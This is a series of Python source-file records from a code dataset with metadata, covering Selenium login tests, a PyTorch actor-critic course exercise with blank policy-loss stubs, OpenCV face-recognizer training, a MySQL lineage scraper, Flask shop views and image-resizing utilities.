div.login_btn > button\"\n ).click()\n sleep(5)\n\n driver.get_screenshot_as_file(\"sc_img/{}.png\".format(\n time.strftime(\"%Y_%m_%d_%H_%M_%S\")))\n\n if __name__ == '__main__':\n print(\"\")\n", "sub_path": "myHTML_report/testCase/TestCaseLogin.py", "file_name": "TestCaseLogin.py", "file_ext": "py", "file_size_in_byte": 1630, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 14, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 14, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 37, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "633714578", "text": "import numpy as np\nimport torch as th\nfrom torch import nn\nfrom storage import Buffer\nfrom torch.distributions import Uniform\nfrom copy import deepcopy\n\nclass ActorCritic:\n\n def __init__(\n self,\n policy,\n qf,\n env,\n discount,\n qf_optimiser,\n policy_optimiser,\n 
max_evaluation_episode_length=200,\n num_evaluation_episodes=5,\n num_training_episode_steps=1000,\n batch_size=128,\n buffer_size = 10000,\n eval_deterministic = True,\n training_on_policy = False,\n vf=None,\n vf_optimiser=None\n ):\n\n self.policy = policy\n self.qf = qf\n self.vf = vf\n self.target_vf = deepcopy(vf)\n self.tau = 1e-2\n self.vf_optimiser = vf_optimiser\n self.qf_optimiser = qf_optimiser\n self.policy_optimiser = policy_optimiser\n self.env = env\n self.discount = discount\n self.batch_size = batch_size\n self.max_evaluation_episode_length = max_evaluation_episode_length\n self.num_evaluation_episodes = num_evaluation_episodes\n self.num_training_episode_steps = num_training_episode_steps\n self.training_on_policy = training_on_policy\n self.buffer = Buffer(buffer_size=buffer_size)\n self.loss = nn.MSELoss()\n self.pretraining_policy = Uniform(high=th.Tensor([policy.max_action]), low=th.Tensor([policy.min_action]))\n self.eval_deterministic = eval_deterministic\n\n self.R_av = None\n self.R_tot = 0\n\n def reset(self):\n self.state = th.from_numpy(self.env.reset()).float()\n\n def evaluate(self, render=False):\n\n total_return = 0\n\n for _ in range(self.num_evaluation_episodes):\n state = th.from_numpy(self.env.reset()).float()\n episode_return = 0\n\n for _ in range(self.max_evaluation_episode_length):\n action = self.policy.get_action(state, self.eval_deterministic)\n action = np.array([action.item()])\n\n if render:\n self.env.render()\n state, reward, terminal, _ = self.env.step(action)\n state = th.from_numpy(state).float()\n\n episode_return += reward\n\n if terminal:\n break\n\n total_return += episode_return\n\n self.average_return = total_return/self.num_evaluation_episodes\n\n def sample_episode(self, exploration_mode=False):\n\n self.reset()\n state = self.state\n\n for _ in range(self.num_training_episode_steps):\n\n if exploration_mode:\n action = self.pretraining_policy.sample()\n else:\n action = self.policy.get_action(state)\n next_state, reward, terminal, _ = self.env.step(action.numpy())\n next_state = th.from_numpy(next_state).float()\n reward = th.Tensor([reward])\n terminal = th.Tensor([terminal])\n\n self.buffer.add(state=state,\n action=action,\n reward=reward,\n next_state=next_state,\n terminal=terminal)\n\n state = next_state\n if terminal:\n self.reset()\n state = self.state\n\n def env_step(self):\n\n state = self.state\n action = self.policy.get_action(state)\n next_state, reward, terminal, _ = self.env.step(action.numpy())\n next_state = th.from_numpy(next_state).float()\n reward = th.Tensor([reward])\n terminal = th.Tensor([terminal])\n\n self.buffer.add(state=state,\n action=action,\n reward=reward,\n next_state=next_state,\n terminal=terminal)\n\n self.state = next_state\n\n def train_score(self):\n if self.training_on_policy:\n batch = self.buffer.whole_batch()\n self.buffer.clear()\n else:\n batch = self.buffer.random_batch(self.batch_size)\n states = batch['states']\n actions = batch['actions']\n rewards = batch['rewards']\n next_states = batch['next_states']\n terminals = batch['terminals']\n\n new_actions, log_pis = self.policy.get_action_and_log_prob(states)\n values = self.vf(states)\n state_actions = th.cat((states, actions), 1)\n q_values = self.qf(state_actions)\n next_values = self.target_vf(next_states)\n new_state_actions = th.cat((states, new_actions), 1)\n new_q_values = self.qf(new_state_actions)\n\n \"\"\"\n Value (Critic) Losses:\n \"\"\"\n\n v_targets = new_q_values\n vf_loss = (v_targets.detach() - 
values).pow(2).mean()\n\n q_targets = rewards + self.discount * (1 - terminals) * next_values\n qf_loss = (q_targets.detach() - q_values).pow(2).mean()\n\n\n \"\"\"\n Policy (Actor) Losses: TO COMPLETE IN EXERCISE II.2b\n \"\"\"\n # policy_loss =\n\n \"\"\"\n Gradient Updates\n \"\"\"\n self.qf_optimiser.zero_grad()\n qf_loss.backward()\n self.qf_optimiser.step()\n\n self.vf_optimiser.zero_grad()\n vf_loss.backward()\n self.vf_optimiser.step()\n\n self.policy_optimiser.zero_grad()\n # policy_loss.backward()\n self.policy_optimiser.step()\n\n self.soft_update()\n\n def train_reparametrisation(self):\n\n if self.training_on_policy:\n batch = self.buffer.whole_batch()\n self.buffer.clear()\n else:\n batch = self.buffer.random_batch(self.batch_size)\n states = batch['states']\n actions = batch['actions']\n rewards = batch['rewards']\n next_states = batch['next_states']\n terminals = batch['terminals']\n\n state_actions = th.cat((states, actions), 1)\n q_pred = self.qf(state_actions)\n v_pred = self.vf(states)\n new_actions, log_pis = self.policy.r_sample(states)\n\n \"\"\"\n Value (Critic) Losses:\n \"\"\"\n target_v_values = self.target_vf(next_states)\n q_target = rewards + (1. - terminals) * self.discount * target_v_values\n qf_loss = self.loss(q_pred, q_target.detach())\n\n new_state_actions = th.cat((states, new_actions), 1)\n q_new_actions = self.qf(new_state_actions)\n v_target = q_new_actions\n vf_loss = self.loss(v_pred, v_target.detach())\n\n \"\"\"\n Policy (Actor) Loss: TO COMPLETE IN EXERCISE II.3c \n \"\"\"\n # policy_loss =\n\n\n \"\"\"\n Gradient Updates\n \"\"\"\n self.qf_optimiser.zero_grad()\n qf_loss.backward()\n self.qf_optimiser.step()\n\n self.vf_optimiser.zero_grad()\n vf_loss.backward()\n self.vf_optimiser.step()\n\n self.policy_optimiser.zero_grad()\n policy_loss.backward()\n self.policy_optimiser.step()\n\n self.soft_update()\n\n\n def soft_update(self):\n for target_param, param in zip(self.target_vf.parameters(), self.vf.parameters()):\n target_param.data.copy_(\n target_param.data * (1.0 - self.tau) + param.data * self.tau\n )", "sub_path": "algorithms_orig.py", "file_name": "algorithms_orig.py", "file_ext": "py", "file_size_in_byte": 7277, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "copy.deepcopy", "line_number": 32, "usage_type": "call"}, {"api_name": "storage.Buffer", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.distributions.Uniform", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 139, "usage_type": 
"call"}, {"api_name": "torch.cat", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 191, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 203, "usage_type": "call"}]} +{"seq_id": "154423320", "text": "import numpy\nimport pytest\n\nimport optimesh\nfrom meshes import pacman, simple1\n\n\n@pytest.mark.parametrize(\n \"mesh, ref1, ref2, refi\",\n [\n (simple1, 5.0, 2.1213203435596424, 1.0),\n (pacman, 1919.3310978354305, 75.03937100433645, 5.0),\n ],\n)\ndef test_fixed_point(mesh, ref1, ref2, refi):\n X, cells = mesh()\n\n X, cells = optimesh.laplace.fixed_point(X, cells, 0.0, 10)\n\n # Test if we're dealing with the mesh we expect.\n nc = X.flatten()\n norm1 = numpy.linalg.norm(nc, ord=1)\n norm2 = numpy.linalg.norm(nc, ord=2)\n normi = numpy.linalg.norm(nc, ord=numpy.inf)\n\n tol = 1.0e-12\n assert abs(norm1 - ref1) < tol * ref1\n assert abs(norm2 - ref2) < tol * ref2\n assert abs(normi - refi) < tol * refi\n return\n", "sub_path": "test/test_laplace.py", "file_name": "test_laplace.py", "file_ext": "py", "file_size_in_byte": 757, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "optimesh.laplace.fixed_point", "line_number": 18, "usage_type": "call"}, {"api_name": "optimesh.laplace", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 8, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 8, "usage_type": "attribute"}, {"api_name": "meshes.simple1", "line_number": 11, "usage_type": "name"}, {"api_name": "meshes.pacman", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "75102392", "text": "# This scripts assumes that the dataframe has been created and saved in data.txt\n\nimport pickle\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom dataFrameUtilities import selectTime, selectColumns, addRollingMeanColumns\n\ninput = open('data.txt', 'rb')\ndata = pickle.load(input)\ninput.close()\n\ntimeSelected = selectTime(data, '2016-09-01', '2019-03-06')\n\npain = selectColumns(timeSelected, ['kneePain'])\npain = addRollingMeanColumns(pain, ['kneePain'], 21)\n\nenv = addRollingMeanColumns(timeSelected, ['steps','denivelation'], 21)\nenvRollingMean = selectColumns(env, ['stepsRollingMean','denivelationRollingMean'])\nenvBrut = selectColumns(env, ['steps','denivelation'])\n\nfig, axes = plt.subplots(nrows=3, ncols=1)\n\npain.plot(ax=axes[0])\nenvBrut.plot(ax=axes[1])\nenvRollingMean.plot(ax=axes[2])\n\nplt.legend(loc='best')\nplt.show()\n", "sub_path": "firstExperimentsAndCode/2_analyzeDataKnee.py", "file_name": "2_analyzeDataKnee.py", "file_ext": "py", "file_size_in_byte": 854, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pickle.load", "line_number": 10, "usage_type": "call"}, {"api_name": "dataFrameUtilities.selectTime", "line_number": 13, "usage_type": "call"}, {"api_name": 
"dataFrameUtilities.selectColumns", "line_number": 15, "usage_type": "call"}, {"api_name": "dataFrameUtilities.addRollingMeanColumns", "line_number": 16, "usage_type": "call"}, {"api_name": "dataFrameUtilities.addRollingMeanColumns", "line_number": 18, "usage_type": "call"}, {"api_name": "dataFrameUtilities.selectColumns", "line_number": 19, "usage_type": "call"}, {"api_name": "dataFrameUtilities.selectColumns", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "310062815", "text": "\"\"\"\nThis file is used for train face dataset\n\"\"\"\n\nimport cv2,os\nimport numpy as np\nfrom PIL import Image\nimport pickle\n\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\ndetector = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\ndef getImagesAndLabels(datasetPath):\n #get the path of all the files in the folder\n #create empth face list\n faceSamples_Train=[]\n # create empty ID list\n ids_Labels = []\n labelIds={}\n currentID = 0\n for root, dirs, files in os.walk(datasetPath):\n #now looping through all the image paths and loading the Ids and the images\n for file in files:\n imagePath = os.path.join(root, file)\n label = os.path.basename(root).replace(\" \", \"-\").lower()\n if not label in labelIds:\n labelIds[label] = currentID\n currentID+=1\n # getting the Id from the image\n Ids = labelIds[label]\n #loading the image and converting it to gray scale\n pilImage=Image.open(imagePath).convert('L')\n #Now we are converting the PIL image into numpy array\n imageNp=np.array(pilImage, 'uint8')\n # extract the face from the training image sample\n faces=detector.detectMultiScale(imageNp)\n #If a face is there then append that in the list as well as Id of it\n for (x,y,w,h) in faces:\n faceSamples_Train.append(imageNp[y:y + h, x:x + w])\n ids_Labels.append(Ids)\n with open(\"labels.pickle\",\"wb\") as f:\n pickle.dump(labelIds,f)\n return faceSamples_Train, ids_Labels\n\n\nfaceSamples_Train, ids_Labels = getImagesAndLabels('dataSets')\nrecognizer.train(faceSamples_Train, np.array(ids_Labels))\nrecognizer.save('trainner.yml')\n\n\n\n\n", "sub_path": "trainer.py", "file_name": "trainer.py", "file_ext": "py", "file_size_in_byte": 1786, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "cv2.face.LBPHFaceRecognizer_create", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.face", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.CascadeClassifier", "line_number": 11, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 32, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 32, "usage_type": "name"}, {"api_name": "numpy.array", 
"line_number": 34, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "560335793", "text": "import matplotlib.pyplot as plt\n\nfrom Random_Walk_Class import RandomWalk\n\n# 只要程序处于活动状态,就不断地模拟随机漫步\nwhile True:\n rw = RandomWalk() # 创建一个 RandomWalk实例\n rw.fill_walk() # 执行漫步操作\n\n # 将所有的点都绘制出来\n plt.style.use('seaborn-darkgrid')\n fig, ax = plt.subplots()\n point_numbers = range(rw.num_points)\n ax.scatter(rw.x_values, rw.y_values, c=list(point_numbers), cmap=plt.cm.viridis, edgecolors='none' ,s=5)\n plt.show()\n\n keep_running = input(\"Make another walk? (y/n): \")\n if keep_running == 'n' or keep_running == 'N':\n print(\"Random walk has been terminated.\")\n break\n elif keep_running == 'y' or keep_running == 'Y':\n print(\"Processing...\")\n continue\n else:\n print(\"Input Error!\")\n break\n# end\n", "sub_path": "Random_Walk/Random_Walk_2.py", "file_name": "Random_Walk_2.py", "file_ext": "py", "file_size_in_byte": 856, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "Random_Walk_Class.RandomWalk", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 11, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 14, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "485018876", "text": "import logging\r\nfrom google.datacatalog_connectors.mysql_.lineage_extractor \\\r\n import logs_reader, asset_level_lineage_extractor\r\nfrom google.datacatalog_connectors.mysql_.parse.parse_sql import MySqlParser\r\n\r\n\r\nclass AssetLevelLinneagScraper():\r\n\r\n def __init__(self, connection):\r\n self.connection = connection\r\n\r\n def scrape(self):\r\n # read logs\r\n reader = self._get_log_reader()(self.connection)\r\n logs = reader.read_logs()\r\n\r\n # extract lineage\r\n lineageList = []\r\n lineage_extractor = self._get_lineage_extractor()()\r\n\r\n for log in logs:\r\n if log['command_type'] == 'Query':\r\n query = log['argument'].decode('ascii')\r\n if lineage_extractor.query_has_lineage(query):\r\n try:\r\n log = f'Parsing Query: {query}\\n'\r\n parse_tree = self._get_sql_parser()().parse_query(\r\n query)\r\n log += '---------------- Parse Tree ----------------\\n'\r\n log += str(parse_tree) + '\\n'\r\n log += '----------------- lineage -----------------\\n'\r\n lineage = lineage_extractor \\\r\n .extract_asset_lineage_from_parsed_tree(parse_tree)\r\n log += str(lineage) + '\\n'\r\n lineageList.extend(lineage)\r\n logging.info(log)\r\n except Exception as e:\r\n logging.error(\"Parse error: Couldn't parse: \" + query)\r\n print(e)\r\n\r\n else:\r\n logging.info(\"Query has no lineage (Skipped): \" + query)\r\n\r\n # return lineage info\r\n return lineageList\r\n\r\n def _get_log_reader(self):\r\n return logs_reader.LogsReader\r\n\r\n def _get_sql_parser(self):\r\n return MySqlParser\r\n\r\n 
def _get_lineage_extractor(self):\r\n return asset_level_lineage_extractor.AssetLevelLineageExtractor\r\n", "sub_path": "google-datacatalog-mysql-lineage-extractor/src/google/datacatalog_connectors/mysql_/lineage_extractor/asset_level_lineage_scraper.py", "file_name": "asset_level_lineage_scraper.py", "file_ext": "py", "file_size_in_byte": 2049, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.info", "line_number": 36, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 42, "usage_type": "call"}, {"api_name": "google.datacatalog_connectors.mysql_.lineage_extractor.logs_reader.LogsReader", "line_number": 48, "usage_type": "attribute"}, {"api_name": "google.datacatalog_connectors.mysql_.lineage_extractor.logs_reader", "line_number": 48, "usage_type": "name"}, {"api_name": "google.datacatalog_connectors.mysql_.parse.parse_sql.MySqlParser", "line_number": 51, "usage_type": "name"}, {"api_name": "google.datacatalog_connectors.mysql_.lineage_extractor.asset_level_lineage_extractor.AssetLevelLineageExtractor", "line_number": 54, "usage_type": "attribute"}, {"api_name": "google.datacatalog_connectors.mysql_.lineage_extractor.asset_level_lineage_extractor", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "374246745", "text": "from flask import Flask, request, render_template\nfrom app.libs.api import CachedApi\nfrom app.models import Pagination\n\napp = Flask(__name__)\n\nPRODUCTS_PER_CATEGORY_PAGE = 5\nCATEGORY_PER_HOMEPAGE = 9\nPRODUCT_SHORT_DESCRIPTION_LENGTH = 250\n\n\nPAGE_404_TEXTS = {\n 'title': 'Ooops, něco není dobře',\n 'text': 'Zdá se, že hledáte stranku, která tu není',\n 'suggestion': 'Zkusme začít od začátku',\n 'button_text': 'Na začátek'\n}\n\nPAGE_500_TEXTS = {\n 'title': 'Ooops, zdá se, že se něco pokazilo',\n 'text': 'Slibujeme, že se to stává maximálně jednou za deset let!',\n 'suggestion': 'Zkuste akci opakovat',\n 'button_text': 'Opakovat'\n}\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('oops.html', url='/', **PAGE_404_TEXTS), 404\n\n\n@app.errorhandler(500)\ndef internal_server_error(e):\n return render_template('oops.html', url=request.url, **PAGE_500_TEXTS), 500\n\n\n@app.route('/')\ndef homepage():\n page_number = request.args.get('page', default=1, type=int)\n\n api = CachedApi()\n all_categories = api.fetch_all_categories()\n pagination = Pagination(len(all_categories.categories), CATEGORY_PER_HOMEPAGE, page_number)\n\n offset = (pagination.current_page - 1) * CATEGORY_PER_HOMEPAGE\n limit = CATEGORY_PER_HOMEPAGE\n\n categories = all_categories.categories[offset:offset + limit + 1]\n\n return render_template('categories.html',\n all_categories=all_categories,\n categories=categories,\n pagination=pagination)\n\n\n@app.route('/categories/')\ndef category_page(category_id):\n page_number = request.args.get('page', default=1, type=int)\n\n api = CachedApi()\n all_categories = api.fetch_all_categories()\n\n product_count = api.fetch_product_count(category_id)\n pagination = Pagination(product_count, PRODUCTS_PER_CATEGORY_PAGE, page_number)\n\n products = api.fetch_products(category_id,\n offset=(pagination.current_page - 1) * PRODUCTS_PER_CATEGORY_PAGE,\n limit=PRODUCTS_PER_CATEGORY_PAGE)\n\n category = api.fetch_category(category_id)\n\n return render_template('category.html',\n all_categories=all_categories,\n category=category,\n 
product_short_description_length=PRODUCT_SHORT_DESCRIPTION_LENGTH,\n products=products,\n pagination=pagination)\n\n\n@app.route('/products/')\ndef product_page(product_id):\n api = CachedApi()\n product = api.fetch_product(product_id)\n category = api.fetch_category(product.category_id)\n\n return render_template('product.html',\n product=product,\n category=category,\n product_short_description_length=PRODUCT_SHORT_DESCRIPTION_LENGTH)\n", "sub_path": "app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2945, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "app.libs.api", "line_number": 5, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 29, "usage_type": "call"}, {"api_name": "app.libs.api.errorhandler", "line_number": 27, "usage_type": "call"}, {"api_name": "app.libs.api", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.url", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "app.libs.api.errorhandler", "line_number": 32, "usage_type": "call"}, {"api_name": "app.libs.api", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "app.libs.api.CachedApi", "line_number": 41, "usage_type": "call"}, {"api_name": "app.models.Pagination", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 50, "usage_type": "call"}, {"api_name": "app.libs.api.route", "line_number": 37, "usage_type": "call"}, {"api_name": "app.libs.api", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "app.libs.api.CachedApi", "line_number": 60, "usage_type": "call"}, {"api_name": "app.models.Pagination", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 72, "usage_type": "call"}, {"api_name": "app.libs.api.route", "line_number": 56, "usage_type": "call"}, {"api_name": "app.libs.api", "line_number": 56, "usage_type": "name"}, {"api_name": "app.libs.api.CachedApi", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 86, "usage_type": "call"}, {"api_name": "app.libs.api.route", "line_number": 80, "usage_type": "call"}, {"api_name": "app.libs.api", "line_number": 80, "usage_type": "name"}]} +{"seq_id": "211336104", "text": "import cv2\n\nfrom src.utils.transform import change_transform_origin\n\n\ndef adjust_transform_for_image(transform, image, relative_translation):\n \"\"\" Adjust a transformation for a specific image.\n\n The translation of the matrix will be scaled with the size of the image.\n The linear part of the transformation will adjusted so that the origin of the transformation will be at the center of the image.\n \"\"\"\n height, width, channels = image.shape\n\n result = transform\n\n # Scale the translation with the image size if specified.\n 
if relative_translation:\n result[0:2, 2] *= [width, height]\n\n # Move the origin of transformation.\n result = change_transform_origin(transform, (0.5 * width, 0.5 * height))\n\n return result\n\n\nclass TransformParameters:\n \"\"\" Struct holding parameters determining how to apply a transformation to an image.\n\n Args\n fill_mode: One of: 'constant', 'nearest', 'reflect', 'wrap'\n interpolation: One of: 'nearest', 'linear', 'cubic', 'area', 'lanczos4'\n cval: Fill value to use with fill_mode='constant'\n relative_translation: If true (the default), interpret translation as a factor of the image size.\n If false, interpret it as absolute pixels.\n \"\"\"\n\n def __init__(\n self,\n fill_mode='nearest',\n interpolation='linear',\n cval=0,\n relative_translation=True,\n ):\n self.fill_mode = fill_mode\n self.cval = cval\n self.interpolation = interpolation\n self.relative_translation = relative_translation\n\n def cvBorderMode(self):\n if self.fill_mode == 'constant':\n return cv2.BORDER_CONSTANT\n if self.fill_mode == 'nearest':\n return cv2.BORDER_REPLICATE\n if self.fill_mode == 'reflect':\n return cv2.BORDER_REFLECT_101\n if self.fill_mode == 'wrap':\n return cv2.BORDER_WRAP\n\n def cvInterpolation(self):\n if self.interpolation == 'nearest':\n return cv2.INTER_NEAREST\n if self.interpolation == 'linear':\n return cv2.INTER_LINEAR\n if self.interpolation == 'cubic':\n return cv2.INTER_CUBIC\n if self.interpolation == 'area':\n return cv2.INTER_AREA\n if self.interpolation == 'lanczos4':\n return cv2.INTER_LANCZOS4\n\n\ndef apply_transform(matrix, image, params):\n \"\"\"\n Apply a transformation to an image.\n\n The origin of transformation is at the top left corner of the image.\n\n The matrix is interpreted such that a point (x, y) on the original image is moved to transform * (x, y) in the generated image.\n Mathematically speaking, that means that the matrix is a transformation from the transformed image space to the original image space.\n\n Args\n matrix: A homogeneous 3 by 3 matrix holding representing the transformation to apply.\n image: The image to transform.\n params: The transform parameters (see TransformParameters)\n \"\"\"\n output = cv2.warpAffine(\n image,\n matrix[:2, :],\n dsize=(image.shape[1], image.shape[0]),\n flags=params.cvInterpolation(),\n borderMode=params.cvBorderMode(),\n borderValue=params.cval,\n )\n return output\n\n\ndef compute_resize_scale(image_shape, min_side=720, max_side=1280):\n \"\"\" Compute an image scale such that the image size is constrained to min_side and max_side.\n\n Args\n min_side: The image's min side will be equal to min_side after resizing.\n max_side: If after resizing the image's max side is above max_side, resize until the max side is equal to max_side.\n\n Returns\n A resizing scale.\n \"\"\"\n (rows, cols, _) = image_shape\n\n smallest_side = min(rows, cols)\n\n # rescale the image so the smallest side is min_side\n scale = min_side / smallest_side\n\n # check if the largest side is now greater than max_side, which can happen\n # when images have a large aspect ratio\n largest_side = max(rows, cols)\n if largest_side * scale > max_side:\n scale = max_side / largest_side\n\n return scale\n\n\ndef resize_image(img, min_side=720, max_side=1280):\n \"\"\" Resize an image such that the size is constrained to min_side and max_side.\n\n Args\n min_side: The image's min side will be equal to min_side after resizing.\n max_side: If after resizing the image's max side is above max_side, resize until the max side is equal to 
max_side.\n\n Returns\n A resized image.\n \"\"\"\n # compute scale to resize the image\n scale = compute_resize_scale(img.shape, min_side=min_side, max_side=max_side)\n\n # resize the image with the computed scale\n img = cv2.resize(img, None, fx=scale, fy=scale)\n\n return img, scale\n", "sub_path": "src/utils/image.py", "file_name": "image.py", "file_ext": "py", "file_size_in_byte": 4817, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "src.utils.transform.change_transform_origin", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.BORDER_CONSTANT", "line_number": 51, "usage_type": "attribute"}, {"api_name": "cv2.BORDER_REPLICATE", "line_number": 53, "usage_type": "attribute"}, {"api_name": "cv2.BORDER_REFLECT_101", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cv2.BORDER_WRAP", "line_number": 57, "usage_type": "attribute"}, {"api_name": "cv2.INTER_NEAREST", "line_number": 61, "usage_type": "attribute"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 63, "usage_type": "attribute"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 65, "usage_type": "attribute"}, {"api_name": "cv2.INTER_AREA", "line_number": 67, "usage_type": "attribute"}, {"api_name": "cv2.INTER_LANCZOS4", "line_number": 69, "usage_type": "attribute"}, {"api_name": "cv2.warpAffine", "line_number": 86, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 137, "usage_type": "call"}]} +{"seq_id": "210011562", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('website', '0028_auto_20151124_1336'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='comment',\n name='id',\n field=models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True),\n ),\n migrations.AlterField(\n model_name='comment',\n name='linked_comment',\n field=models.ForeignKey(blank=True, to='website.Comment', null=True),\n ),\n ]\n", "sub_path": "website/migrations/0029_auto_20151124_1353.py", "file_name": "0029_auto_20151124_1353.py", "file_ext": "py", "file_size_in_byte": 660, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 